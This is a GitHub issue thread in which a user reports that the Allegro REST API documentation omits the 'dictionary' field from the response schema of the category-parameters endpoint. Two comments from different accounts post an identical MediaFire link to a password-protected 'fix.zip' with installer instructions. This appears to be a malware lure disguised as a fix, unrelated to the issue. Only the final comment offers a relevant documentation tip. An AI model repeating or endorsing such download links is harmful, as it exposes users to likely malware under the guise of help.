### ISSUE TITLE
Field 'deictionary' is missing for category parameters

### ISSUE THREAD

**Issue by Arly0** [allegro/allegro-api#9738]
Hi, I was reading your documentation and looking for a list of values for category parameters (if such are needed). I had to search in issue and prototype endpoints. Either I don't understand something, or the documentation ([this one endpoint](https://developer.allegro.pl/documentation/#operation/getFlatParametersUsingGET_2)) response schema is missing the dictionary field, which is present as an answer in the endpoint. Also because of this, an API (automatic) is generated with a problem when the response does not retrieve the dictionary. 
![Allegro-Developer-Portal-baza-wiedzy-o-Allegro-REST-API](https://github.com/user-attachments/assets/8a2e9fec-ee9d-4f94-bb54-2a9a5e2cf40b)

Thank you

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AureliuszBrussy** [comment]
In the documentation, next to the parameter type, choose `dictionary` instead of `integer`.
